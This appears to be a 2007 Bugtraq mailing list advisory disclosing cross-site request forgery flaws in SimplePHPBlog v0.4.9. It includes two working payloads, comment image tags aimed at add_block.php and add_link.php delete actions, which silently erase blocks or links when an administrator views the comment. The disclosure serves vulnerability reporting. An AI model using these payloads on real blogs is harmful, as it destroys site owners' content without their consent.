Bugtraq mailing list archives
Multiple CSRF in SimplePHPBlog
From: deme () hackish eu
Date: 17 Oct 2007 14:00:55 -0000
SimplePHPBlog Cross Site Request Forgeries Tested on v0.4.9 Discovered by: Demential Web: http://hackish.altervista.org E-mail: deme [at] hackish [dot] eu SimplePHPBlog website: http://www.simplephpblog.com/ - posting [img=add_block.php?action=delete&block_id=*] in a comment where * is an ID of a block, when administrator reads the comment block * will be erased. - posting [img=add_link.php?action=delete&link_id=*] in a comment where * is an ID of a link, when administrator reads the comment link * will be erased.
Current thread:
- Multiple CSRF in SimplePHPBlog deme (Oct 17)
- Re: Multiple CSRF in SimplePHPBlog Hanno Böck (Oct 18)